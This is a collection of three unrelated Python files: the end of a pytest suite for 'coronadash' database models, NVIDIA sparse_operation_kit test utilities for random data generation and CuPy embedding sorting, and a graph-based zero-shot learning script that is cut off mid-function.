from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=8)
def test_if_sql_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=9)
def test_sql_insert_and_find(self):
""" based on test_generate_model.
Tests if a model can insert values in the DB
and can be found by title attribute.
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.sql.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(PowTestModel.title=="TestnamePowTestRunner")
assert res.count()==1
m.session.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
#
# tinyDB tests
#
@pytest.mark.run(order=10)
@pytest.mark.minimal
def test_tinydb_generate_model(self):
""" test if sql model is generated"""
print(" .. Test tinyDB generate_model")
import coronadash.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "tinydb", appname="coronadash")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/tinydb/" + MODELNAME + ".py"))
@pytest.mark.run(order=11)
@pytest.mark.minimal
def test_if_tinydb_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=12)
@pytest.mark.minimal
def test_if_tinydb_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=13)
@pytest.mark.minimal
def test_tinydb_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model tinyDB is correct type")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=14)
def test_tinydb_insert_and_find(self):
""" based on test_generate_model. Tests if a model can insert values
and can be found back.
"""
print(" .. Test tinyDB: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(m.Query.title=="TestnamePowTestRunner")
assert res
m.db.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
if __name__ == "__main__":
print(55*"-")
print(" running pow Tests on: " + sys.platform)
print(" ... ")
if sys.platform.startswith("darwin"):
# osx
ret = pytest.main(["-k-notonosx", "pow_tests.py"])
else:
ret = pytest.main(["pow_tests.py"])
print(" Failures: " +str(ret))
print(55*"-")
|
utils.py
|
"""
Copyright (c) 2021, NVIDIA CORPORATION.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, os
sys.path.append(os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), r"../../../")))
import sparse_operation_kit as sok
import tensorflow as tf
import pickle
import numpy as np
from multiprocessing import Process
local_ips = ("localhost", "127.0.0.1", "0.0.0.0")
def get_local_ip(hostname=None):
import socket
_hostname = socket.gethostname()
return socket.gethostbyname(hostname or socket.gethostname())
def is_local_ip(ip_address):
return True if ip_address in local_ips else False
def all_ips_in_local(ips):
for ip in ips:
if not is_local_ip(ip):
return False
return True
def get_local_gpu_count():
import os
text = os.popen("nvidia-smi --list-gpus").read()
text = text.strip().split("\n")
return len(text)
def get_cuda_version():
import os, re
text = os.popen("nvcc --version").read()
version = text.strip().split("\n")[-1]
version = re.search("cuda_\d+.\d+.", version).group(0)
version = re.search("\d+.\d+", version).group(0)
return version
class TestProcess(object):
def __init__(self,
func,
task_id,
arguments):
self.func = func
self.task_id = task_id
self.arguments = arguments
self.arguments.task_id = self.task_id
self.process = Process(target=self.func, args=(self.arguments,))
def start(self):
self.process.start()
def join(self):
if self.process.is_alive():
self.process.join()
def save_to_file(filename, *args):
with open(filename, 'wb') as file:
num_of_items = len(args)
if (num_of_items == 0):
raise ValueError("Nothing needed to be saved.")
pickle.dump(num_of_items, file, pickle.HIGHEST_PROTOCOL)
for item in args:
pickle.dump(item, file, pickle.HIGHEST_PROTOCOL)
print("[INFO]: dumpped items to file %s" %filename)
def restore_from_file(filename):
results = list()
with open(filename, "rb") as file:
num_of_items = pickle.load(file)
for _ in range(num_of_items):
item = pickle.load(file)
results.append(item)
print("[INFO] loadded from file %s" %filename)
return tuple(results)
def get_embedding_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return sok.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_dense_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return tf.keras.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_ones_tensor(max_vocab_size_per_gpu,
embedding_vec_size,
num,
task_id=None):
tensor = np.ones(shape=[max_vocab_size_per_gpu, embedding_vec_size], dtype=np.float32)
all_tensors = [tensor for _ in range(num)]
return all_tensors
def get_random_value(shape, dtype=None):
tensor = np.random.normal(size=shape)
tensor = tensor.astype(np.float32)
return tensor
def generate_random_samples(num_of_samples,
vocabulary_size,
slot_num,
max_nnz,
dtype=np.int64,
use_sparse_mask=True):
"""
This function is used to generate random samples used for training.
#args:
num_of_samples: integer, how many samples should be generated.
vocabulary_size: integer,
slot_num: integer,
max_nnz: integer
use_sparse_mask: boolean, whether to use sparse mask to generate sparse datas
#returns:
all_keys: dense tensor, whose shape is [num_of_samples, slot_num, max_nnz]
all_labels: dense tensor, whose shape is [num_of_samples, 1]
"""
print("[INFO]: begin to generate random samples")
from tensorflow.python.distribute.values import PerReplica
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if (vocabulary_size // slot_num <= 2 * max_nnz):
raise ValueError("Too small vocabulary_size. vocabulary_size: %d // slot_num: %d = %d <= 2 * max_nnz: %d"
%(vocabulary_size, slot_num, vocabulary_size // slot_num, 2 * max_nnz))
if use_sparse_mask:
mask = np.random.choice([-1, 1], size=(num_of_samples, slot_num, max_nnz))
filter_ = np.ones(shape=(num_of_samples, slot_num, max_nnz))
sum_ = np.sum(mask * filter_, axis=-1, keepdims=True)
index = np.where(sum_ == -max_nnz)
index = tuple(map(lambda array: array[1:] if array.ndim and array.size else array, index))
mask[index] = 1
with cp.cuda.Device(0):
all_keys = cp.zeros(shape=(num_of_samples, slot_num, max_nnz), dtype=cp.int64)
random_kernel = cp.RawKernel(r'''
__device__ size_t randInt(size_t gid, const size_t range) {
return (((gid * clock() * 214013L + 2531011L) >> 16) & 0x7fff) % range;
}
extern "C" __global__
void my_kernel(long long *nums, const size_t count,
const size_t slot_num, const size_t max_nnz,
const size_t vocab_per_slot) {
size_t gid = blockIdx.x * blockDim.x + threadIdx.x;
for (size_t i = gid; i < count; i += blockDim.x * gridDim.x) {
size_t tid_in_sample = i % (slot_num * max_nnz);
size_t slot_id = tid_in_sample / max_nnz;
size_t col_id = tid_in_sample % max_nnz;
nums[i] = vocab_per_slot * slot_id + randInt(gid, vocab_per_slot);
}
}
''', 'my_kernel')
random_kernel((num_of_samples,), (1024,),
(all_keys, num_of_samples * slot_num * max_nnz,
slot_num, max_nnz, vocabulary_size // slot_num))
all_keys = all_keys.get()
if use_sparse_mask:
all_keys[mask == -1] = -1
all_keys = np.sort(all_keys, axis=-1)[:,:,::-1]
all_labels = np.random.randint(low=0, high=2, size=(num_of_samples, 1))
print("[INFO]: generated random samples")
return all_keys, all_labels
def tf_dataset(keys, labels,
batchsize,
to_sparse_tensor=False,
repeat=None,
args=None):
num_of_samples, slot_num, max_nnz = keys.shape
def _convert_to_sparse(keys, labels):
if tf.rank(keys) != 2:
keys = tf.reshape(keys, shape=[-1, max_nnz])
indices = tf.where(keys != -1)
values = tf.gather_nd(keys, indices)
if args is not None and hasattr(args, "key_dtype"):
if args.key_dtype == "int64":
values = tf.cast(values, dtype=tf.int64)
elif args.key_dtype == "uint32":
values = tf.cast(values, dtype=tf.uint32)
else:
raise ValueError("Not supported key_dtype.")
return tf.sparse.SparseTensor(indices=indices,
values=values,
dense_shape=[batchsize * slot_num, max_nnz]), labels
def _cast_values(keys, labels):
if args is not None and hasattr(args, "key_dtype"):
if args.key_dtype == "int64":
keys = tf.cast(keys, dtype=tf.int64)
elif args.key_dtype == "uint32":
keys = tf.cast(keys, dtype=tf.uint32)
else:
raise ValueError("Not supported key_dtype.")
return keys, labels
dataset = tf.data.Dataset.from_tensor_slices((keys, labels))
dataset = dataset.repeat(repeat)
dataset = dataset.batch(batchsize, drop_remainder=True)
if to_sparse_tensor:
dataset = dataset.map(lambda keys, labels:
_convert_to_sparse(keys, labels),
num_parallel_calls=1)
else:
dataset = dataset.map(lambda keys, labels:
_cast_values(keys, labels),
num_parallel_calls=1)
return dataset
def try_make_dirs(directory, chief=True):
import os
if not os.path.exists(directory) and chief:
os.makedirs(directory)
def sort_embedding_variables_by_key(keys, embedding_values, embedding_vec_size, use_hashtable=True, gpu_num=None):
"""
This function is used to sort the embedding values by its relavent keys.
For example, keys: [5, 3, 6, 1], embedding values: [[0, 0, 0, 0],
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]]
After sorted, keys: [1, 3, 5, 6], embedding values: [[3, 3, 3, 3],
[1, 1, 1, 1],
[0, 0, 0, 0],
[2, 2, 2, 2]]
"""
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(embedding_values, np.ndarray):
embedding_values = np.array(embedding_values, dtype=np.float32)
# currently, embedding will set a fast hashtable when user specified use_hashtable=False
# so that the following code snippet is not needed.
"""
if not use_hashtable:
vocabulary_size = np.size(keys) // gpu_num
embedding_values = np.reshape(embedding_values, newshape=(-1, embedding_vec_size))
embedding_values_list = np.split(embedding_values, gpu_num, axis=0)
for gpu_id, emb_values in enumerate(embedding_values_list):
invalid_keys = np.array([key for key in range(vocabulary_size) if key % gpu_num != gpu_id], dtype=np.int64)
emb_values[invalid_keys] = 0
valid_embedding_values = np.sum(embedding_values_list, axis=0)
return keys[:vocabulary_size], valid_embedding_values
else:
del gpu_num
"""
sorted_indexes = np.argsort(keys)
sorted_keys = keys[sorted_indexes]
with cp.cuda.Device(0):
d_sorted_values = cp.zeros(shape=embedding_values.shape, dtype=cp.float32)
d_sorted_indexes = cp.asarray(sorted_indexes)
d_embedding_values = cp.asarray(embedding_values)
sort_values_kernel = cp.RawKernel(r'''
extern "C" __global__
void my_kernel(const size_t *sorted_indexes,
const float *values,
float *sorted_values,
const size_t values_step,
const size_t count) {
const size_t col_id = threadIdx.x;
for (size_t row_id = blockIdx.x; row_id < count; row_id += blockDim.x) {
sorted_values[row_id * values_step + col_id] =
values[sorted_indexes[row_id] * values_step + col_id];
}
}
''', 'my_kernel')
sort_values_kernel((keys.size,), (embedding_vec_size,),
(d_sorted_indexes, d_embedding_values, d_sorted_values,
embedding_vec_size, keys.size))
sorted_values = d_sorted_values.get()
return sorted_keys, sorted_values
def read_binary_file(filename,
element_type,
chunk_num_elements=65536):
import struct, os
element_type_map = {"float": ["f", 4],
"int32": ["i", 4],
"long long": ["q", 8],
"unsigned long long": ["Q", 8],
"size_t": ["N", 8],
"unsigned int": ["I", 4]}
elem_size_in_bytes = element_type_map[element_type][1]
file_size_in_bytes = os.path.getsize(filename)
if (file_size_in_bytes % elem_size_in_bytes != 0):
raise ValueError("Invalid element size for file: %s." %filename)
chunk_size_in_bytes = chunk_num_elements * elem_size_in_bytes
if (file_size_in_bytes <= chunk_size_in_bytes):
chunk_size_in_bytes = file_size_in_bytes
chunk_count = 1
else:
chunk_count = file_size_in_bytes // chunk_size_in_bytes
results = list()
with open(filename, "rb") as file:
for _ in range(chunk_count):
buffer = file.read(chunk_size_in_bytes)
if (0 == len(buffer)):
raise RuntimeError("Error in reading file.")
elements = struct.unpack(str(chunk_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
if (file_size_in_bytes - chunk_count * chunk_size_in_bytes > 0):
buffer_size_in_bytes = file_size_in_bytes - chunk_count * chunk_size_in_bytes
buffer = file.read(buffer_size_in_bytes)
elements = struct.unpack(str(buffer_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
return results
def get_valid_tf_values(keys, values):
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(values, np.ndarray):
values = np.array(values, dtype=np.float32)
keys = tf.reshape(keys, [-1])
return tf.gather(values, keys).numpy()
if __name__ == "__main__":
all_keys, all_labels = generate_random_samples(num_of_samples=65536 * 100,
vocabulary_size=8 * 1024 * 1,
slot_num=10,
max_nnz=4,
use_sparse_mask=False)
# print("all_keys:\n", all_keys)
# print("all_labels:\n", all_labels)
dataset = tf_dataset(keys=all_keys, labels=all_labels,
batchsize=65536,
to_sparse_tensor=False,
repeat=1)
for i, (input_tensors, labels) in enumerate(dataset):
print("-"*30, "Iteration ", str(i), "-"*30)
print(input_tensors)
print(labels)
# a = [1, 2, 3]
# b = [4, 5]
# save_to_file("./test.file", a, b)
# a = restore_from_file("./test.file")
# print(a)
# local_ip = get_local_ip()
# print("local_ip: %s" %local_ip)
# keys = np.array([5, 3, 6, 1], dtype=np.int64)
# values = np.array([[0, 0, 0, 0],
# [1, 1, 1, 1],
# [2, 2, 2, 2],
# [3, 3, 3, 3]], dtype=np.float32)
# sorted_keys, sorted_values = sort_embedding_variables_by_key(keys, values, embedding_vec_size=4)
# print(sorted_keys)
# print(sorted_values)
# filename = r"./embedding_variables/test_values.file"
# keys = read_binary_file(filename, element_type="float")
# print(len(keys))
# keys = [5, 3, 6, 1]
# values = [[0, 0],
# [1, 1],
# [2, 2],
# [3, 3],
# [4, 4],
# [5, 5],
# [6, 6]]
# print(get_valid_tf_values(keys, values))
|
graph_ZSL_w_argmin.py
|
import json
import multiprocessing
from datetime import datetime
from node2vec import Node2Vec
import pandas as pd
import numpy as np
import networkx as nx
import pickle
import os
import argparse
from numpy import linalg as la
from sklearn.metrics.pairwise import cosine_similarity
from sklearn import model_selection as sk_ms
from sklearn.metrics import confusion_matrix
from sklearn.multiclass import OneVsRestClassifier
from sklearn.linear_model import LogisticRegression
import random
import math
import matplotlib as mpl
import matplotlib.pyplot as plt
from itertools import chain
from utils import set_gpu
from utlis_graph_zsl import hist_plot, plot_confusion_matrix, plots_2measures_vs_parameter, grid
from IMDb_data_preparation_E2V import MoviesGraph
random.seed(0)
np.random.seed(0)
HEADER = ['movie_weights',
'labels_weights',
'embedding_type',
'embedding_dimension',
'norma_type',
'class_edges_threshold',
'seen_percentage',
'data_name',
'awa2_attributes_weight',
'acc',
'seen_acc',
'unseen_acc']
class GraphImporter:
"""
class that responsible to import or create the relevant graph
"""
def __init__(self, args):
self.data_name = args.data_name
self.graph_percentage = args.graph_percentage
self.threshold = args.threshold
self.args = args
def import_imdb_multi_graph(self, weights):
"""
Make our_imdb multi graph using class
:param weights:
:return:
"""
weights_dict = {'movies_edges': weights[0], 'labels_edges': weights[1]}
dict_paths = {'cast': 'data_set/IMDb title_principals.csv', 'genre': 'data_set/IMDb movies.csv'}
imdb = MoviesGraph(dict_paths, self.args.graph_percentage)
gnx = imdb.create_graph()
labels = imdb.labels2int(gnx)
knowledge_gnx, knowledge_data = imdb.create_knowledge_graph(labels, self.threshold)
multi_gnx = imdb.weighted_multi_graph(gnx, knowledge_gnx, labels, weights_dict)
return multi_gnx
def import_imdb_weighted_graph(self, weights):
weights_dict = {'movies_edges': weights[0], 'labels_edges': weights[1]}
dict_paths = {'cast': 'data_set/IMDb title_principals.csv', 'genre': 'data_set/IMDb movies.csv'}
imdb = MoviesGraph(dict_paths, self.args.graph_percentage)
gnx = imdb.create_graph()
labels = imdb.labels2int(gnx)
knowledge_gnx, knowledge_data = imdb.create_knowledge_graph(labels, float(self.threshold))
weighted_graph = imdb.weighted_graph(gnx, knowledge_gnx, labels, weights_dict)
return weighted_graph
def import_graph(self):
graph = nx.MultiGraph()
data_path = self.data_name + '.txt'
path = os.path.join(self.data_name, data_path)
with open(path, 'r') as f:
for line in f:
items = line.strip().split()
att1 = str(items[0][0])
att2 = str(items[1][0])
graph.add_node(items[0], key=att1)
graph.add_node(items[1], key=att2)
sort_att = np.array([att1, att2])
sort_att = sorted(sort_att)
graph.add_edge(items[0], items[1], key=str(sort_att[0]) + str(sort_att[1]))
return graph
def import_awa2_graph(self, awa2_weights, specific_split, att_weight):
from images_graph_creator import Awa2GraphCreator, ImagesEmbeddings
weights_dict = {'classes_edges': awa2_weights[0], 'labels_edges': awa2_weights[1]}
set_gpu(self.args.gpu)
graph_preparation = ImagesEmbeddings(self.args)
dict_name_class, dict_class_name = graph_preparation.dict_name_class, graph_preparation.dict_class_name
seen_classes, unseen_classes = graph_preparation.seen_classes, graph_preparation.unseen_classes
embeds_matrix, dict_image_embed, dict_image_class = graph_preparation.images_embed_calculator()
dict_idx_image_class = {i: dict_name_class[dict_image_class[image]]
for i, image in enumerate(list(dict_image_class.keys()))}
awa2_graph_creator = Awa2GraphCreator(embeds_matrix, dict_image_embed, dict_name_class, dict_idx_image_class,
self.args.graph_percentage, self.args)
image_graph = awa2_graph_creator.create_image_graph()
kg, dict_class_nodes_translation = awa2_graph_creator.imagenet_knowledge_graph()
kg = awa2_graph_creator.attributed_graph(kg, att_weight)
seen_classes = [dict_class_nodes_translation[c] for c in seen_classes]
unseen_classes = [dict_class_nodes_translation[c] for c in unseen_classes]
split = {'seen': seen_classes, 'unseen': unseen_classes}
labels_graph = awa2_graph_creator.create_labels_graph(dict_class_nodes_translation)
awa2_graph = awa2_graph_creator.weighted_graph(image_graph, kg, labels_graph, weights_dict)
nx.write_gpickle(awa2_graph, 'awa2/train/awa2_graph')
if specific_split:
return awa2_graph, split
else:
split = None
return awa2_graph, split
class EmbeddingCreator(object):
def __init__(self, graph=None, dimension=None, args=None):
self.data_name = args.data_name
self.dim = dimension
self.graph = graph
def create_node2vec_embeddings(self):
# path1 = os.path.join(self.data_name, 'Node2Vec_embedding.pickle')
# path2 = os.path.join(self.data_name, 'Node2Vec_embedding.csv')
# if os.path.exists(path1):
# with open(path1, 'rb') as handle:
# dict_embeddings = pickle.load(handle)
# elif os.path.exists(path2):
# embedding_df = pd.read_csv(path2)
# dict_embeddings = embedding_df.to_dict(orient='list')
# with open(path2, 'wb') as handle:
# pickle.dump(dict_embeddings, handle, protocol=3)
# else:
# node2vec = Node2Vec(self.graph, dimensions=16, walk_length=30, num_walks=200, workers=1)
# model = node2vec.fit()
# nodes = list(self.graph.nodes())
# dict_embeddings = {}
# for i in range(len(nodes)):
# dict_embeddings.update({nodes[i]: np.asarray(model.wv.get_vector(nodes[i]))})
# with open(path1, 'wb') as handle:
# pickle.dump(dict_embeddings, handle, protocol=3)
node2vec = Node2Vec(self.graph, dimensions=self.dim, walk_length=80, num_walks=16, workers=2)
model = node2vec.fit()
nodes = list(self.graph.nodes())
dict_embeddings = {}
for i in range(len(nodes)):
dict_embeddings.update({nodes[i]: np.asarray(model.wv.get_vector(str(nodes[i])))})
return dict_embeddings
def create_event2vec_embeddings(self):
data_path = self.data_name + '_e2v_embeddings.txt'
path = os.path.join(self.data_name, data_path)
cond = 0
dict_embeddings = {}
with open(path, 'r') as f:
for line in f:
if cond == 1:
items = line.strip().split()
dict_embeddings[items[0]] = items[1:]
cond = 1
return dict_embeddings
def create_ogre_embeddings(self, user_initial_nodes_choice=None):
from StaticGraphEmbeddings.our_embeddings_methods.static_embeddings import StaticEmbeddings
if user_initial_nodes_choice is not None:
static_embeddings = StaticEmbeddings(self.data_name, self.graph, initial_size=100, initial_method="node2vec", method="OGRE", H=user_initial_nodes_choice,
dim=self.dim, choose="degrees", regu_val=0, weighted_reg=False, epsilon=0.1, file_tags=None)
else:
static_embeddings = StaticEmbeddings(self.data_name, self.graph, dim=self.dim)
dict_embeddings = static_embeddings.dict_embedding
return dict_embeddings
class EdgesPreparation:
def __init__(self, graph, args, split=None):
self.args = args
# self.multi_graph = multi_graph
self.split = split
self.graph = graph
self.label_edges = self.make_label_edges()
self.unseen_edges, self.test_edges, self.dict_test_edges, self.dict_train_edges, self.dict_unseen_edges \
= self.train_test_unseen_split()
def make_label_edges(self):
"""
Make a list with all the edge from type "labels_edges", i.e. edges between a movie and its class.
:return: list with labels_edges
"""
data_path = self.args.data_name + '_true_edges.pickle'
nodes = list(self.graph.nodes)
label_edges = []
for node in nodes:
if str(node)[0] == 'c':
info = self.graph._adj[node]
neighs = list(info.keys())
for neigh in neighs:
if info[neigh]['key'] == 'labels_edges':
label_edges.append([node, neigh])
try:
with open(os.path.join(self.args.data_name, data_path), 'wb') as handle:
pickle.dump(label_edges, handle, protocol=3)
except:
pass
return label_edges
@staticmethod
def label_edges_classes_ordered(edge_data):
"""
Make a dict of classes and their labels_edges they belong to. For every label_edge
there is only one class it belongs to.
:return: a dict of classes and their labels_edges
"""
dict_class_label_edge = {}
for edge in edge_data:
if edge[0][0] == 'c':
label = edge[0]
else:
label = edge[1]
if dict_class_label_edge.get(label) is not None:
edges = dict_class_label_edge[label]
edges.append(edge)
dict_class_label_edge[label] = edges
else:
dict_class_label_edge.update({label: [edge]})
return dict_class_label_edge
def train_test_unseen_split(self): # unseen edges
ratio = self.args.ratio[0]
dict_true_edges = self.label_edges_classes_ordered(self.label_edges)
classes = list(dict_true_edges.keys())
for i, k in enumerate(sorted(dict_true_edges, key=lambda x: len(dict_true_edges[x]), reverse=True)):
classes[i] = k
seen_classes = classes[:int(self.args.seen_percentage * len(classes))]
unseen_classes = classes[int(self.args.seen_percentage * len(classes)):]
if self.split is not None:
seen_classes = self.split['seen']
unseen_classes = self.split['unseen']
# unseen_classes.append(classes[0])
unseen_edges, seen_edges, train_edges, test_edges = [], [], [], []
for c in unseen_classes:
# class_edges = list(self.graph.edges(c))
# for edge in class_edges:
# self.graph[edge[0]][edge[1]]['weight'] *= 10
for edge in dict_true_edges[c]:
unseen_edges.append(edge)
for c in seen_classes:
seen_edges_c = []
for edge in dict_true_edges[c]:
seen_edges.append(edge)
seen_edges_c.append(edge)
random.Random(4).shuffle(seen_edges_c)
train_edges_c = seen_edges_c[:int(ratio * len(seen_edges_c))]
test_edges_c = seen_edges_c[int(ratio * len(seen_edges_c)):]
for edge in train_edges_c:
train_edges.append(edge)
if len(test_edges_c) > 0:
for edge in test_edges_c:
test_edges.append(edge)
# unseen_edges = [dict_true_edges[c] for c in unseen_classes]
# seen_edges = [dict_true_edges[c] for c in seen_classes]
# random.Random(4).shuffle(seen_edges)
# train_edges = seen_edges[:int(ratio * len(seen_edges))]
# test_edges = seen_edges[int(ratio * len(seen_edges)):]
dict_train_edges = self.label_edges_classes_ordered(train_edges)
dict_test_edges = self.label_edges_classes_ordered(test_edges)
dict_unseen_edges = self.label_edges_classes_ordered(unseen_edges)
# for c in unseen_classes:
# unseen_edges.append(dict_true_edges[c])
return unseen_edges, test_edges, dict_train_edges, dict_test_edges, dict_unseen_edges
def seen_graph(self):
graph = self.graph
for edge in self.unseen_edges:
graph.remove_edge(edge[0], edge[1])
for edge in self.test_edges:
graph.remove_edge(edge[0], edge[1])
return graph
def ogre_initial_nodes(self, gnx):
train_classes = list(self.dict_train_edges.keys())
train_nodes = train_classes.copy()
for c in train_classes:
train_nodes.append(self.dict_train_edges[c][0][1])
# try:
# train_nodes.append(self.dict_train_edges[c][1][1])
# except:
# continue
intial_graph = gnx.subgraph(train_nodes)
return intial_graph
class Classifier:
def __init__(self, dict_train_true, dict_test_true, dict_unseen_edges,
dict_projections, embedding, args):
self.args = args
self.embedding = embedding
self.dict_true_edges = dict_train_true
self.dict_test_true = dict_test_true
self.dict_unseen_edges = dict_unseen_edges
self.norm = set(args.norm)
self.dict_projections = dict_projections
def edges_distance(self, edges):
"""
Calculate the distance of an edge. Take the vertices of the edge and calculate the distance between their
embeddings.
We use to calculate The distance with L1, l2, Cosine Similarity.
:param edge: the edge we want to find its distance.
:return: The distance
"""
embed_edges_0 = [self.dict_projections[edge[0]] for edge in edges]
embed_edges_1 = [self.dict_projections[edge[1]] for edge in edges]
if self.norm == set('L1 Norm'):
norms = la.norm(np.subtract(embed_edges_0, embed_edges_1), 1, axis=1)
elif self.norm == set('L2 Norm'):
norms = la.norm(np.subtract(embed_edges_0, embed_edges_1), 2, axis=1)
elif self.norm == set('cosine'):
try:
all_norms = cosine_similarity(embed_edges_0, embed_edges_1)
norms = []
for i in range(len(all_norms)):
if np.abs(all_norms[i, i]) <= 1:
norms.append(math.acos(all_norms[i, i]))
elif all_norms[i, i] > 1:
norms.append(math.acos(1))
elif all_norms[i, i] < -1:
norms.append(math.acos(-1))
# norms = [math.acos(all_norms[i, i]) if np.abs(all_norms[i, i]) < 1 else math.acos(1) for i in range(len(all_norms))]
except:
print('a')
else:
raise ValueError(f"Wrong name of norm, {self.norm}")
final_norms = np.array(norms).reshape(-1, 1)
return final_norms
def edge_distance(self, edge):
"""
Calculate the distance of an edge. Take the vertices of the edge and calculate the distance between their
embeddings.
We use to calculate The distance with L1, l2, Cosine Similarity.
:param edge: the edge we want to find its distance.
:return: The distance
"""
try:
embd1 = np.array(self.dict_projections[edge[0]]).astype(float)
embd2 = np.array(self.dict_projections[edge[1]]).astype(float)
except:
embd1 = np.ones(self.args.embedding_dimension).astype(float)
embd2 = np.zeros(self.args.embedding_dimension).astype(float)
pass
if self.norm == set('L1 Norm'):
norm = la.norm(np.subtract(embd1, embd2), 1)
elif self.norm == set('L2 Norm'):
norm = la.norm(np.subtract(embd1, embd2), 1)
elif self.norm == set('cosine'):
norm = math.acos(cosine_similarity(embd1.reshape(1, -1), embd2.reshape(1, -1))[0])
else:
raise ValueError(f"Wrong name of norm, {self.norm}")
return norm
def calculate_classifier_value(self, true_edges, false_edges):
"""
Create x and y for Logistic Regression Classifier.
self.dict_projections: A dictionary of all nodes embeddings, where keys==nodes and values==embeddings
:param true_edges: A list of true edges.
:param false_edges: A list of false edges.
:return: x_true/x_false - The feature matrix for logistic regression classifier, of true/false edge.
The i'th row is the norm score calculated for each edge.
y_true_edge/y_false_edge - The edges labels, [1,0] for true/ [0,1] for false.
Also the edge of the label is concatenate to the label.
"""
x_true = self.edges_distance(true_edges)
x_false = self.edges_distance(false_edges)
# x_true, x_false = np.array(norms_true).reshape(-1, 1), np.array(norms_false).reshape(-1, 1)
y_true_edge = np.column_stack((np.ones(shape=(len(true_edges), 1)),
np.zeros(shape=(len(true_edges), 1)))).astype(int)
y_false_edge = np.column_stack((np.zeros(shape=(len(false_edges), 1)),
np.ones(shape=(len(false_edges), 1)))).astype(int)
return x_true, x_false, y_true_edge, y_false_edge
def calculate_by_single_norm(self, true_edges, false_edges):
x_true, x_false = np.zeros(shape=(len(true_edges), 1)), np.zeros(shape=(len(false_edges), 1))
y_true_edge, y_false_edge = np.zeros(shape=(len(true_edges), 4)).astype(int), \
np.zeros(shape=(len(false_edges), 4)).astype(int)
for i, edge in enumerate(true_edges):
norm = self.edge_distance(edge)
x_true[i, 0] = norm
# y_true_edge[i, 2] = edge[0]
# y_true_edge[i, 3] = edge[1]
y_true_edge[i, 0] = str(1)
for i, edge in enumerate(false_edges):
norm = self.edge_distance(edge)
x_false[i, 0] = norm
# y_false_edge[i, 2] = edge[0]
# y_false_edge[i, 3] = edge[1]
y_false_edge[i, 1] = str(1)
return x_true, x_false, y_true_edge, y_false_edge
@staticmethod
def concat_data(x_true, x_false, y_true_edge, y_false_edge):
"""
split the data into rain and test for the true edges and the false one.
:param ratio: determine the train size.
:return: THe split data
"""
x_train, y_train = np.concatenate((x_true, x_false), axis=0), \
np.concatenate((y_true_edge, y_false_edge), axis=0)
# y_train = np.array([y_train_edge.T[0].reshape(-1, 1), y_train_edge.T[1].reshape(-1, 1)]).T.reshape(-1,
# 2).astype(
# int)
return x_train, y_train
def train(self):
"""
Prepare the data for train, also train the classifier and make the test data divide by classes.
:return: The classifier and dict_class_movie_test
"""
path2 = os.path.join(self.args.data_name, f'train/dict_{self.embedding}_{self.args.norm}.pkl')
classes = list(self.dict_true_edges.keys())
# for i, k in enumerate(sorted(self.dict_true_edges, key=lambda x: len(self.dict_true_edges[x]), reverse=True)):
# classes[i] = k
dict_class_movie_test = {}
test_classes = list(self.dict_test_true.keys())
unseen_classes = list(self.dict_unseen_edges.keys())
for c in test_classes:
dict_movie_edge = {}
for edge in self.dict_test_true[c]:
if edge[0][0] == 'c':
movie = edge[1]
else:
movie = edge[0]
dict_movie_edge[movie] = edge
dict_class_movie_test[c] = dict_movie_edge.copy()
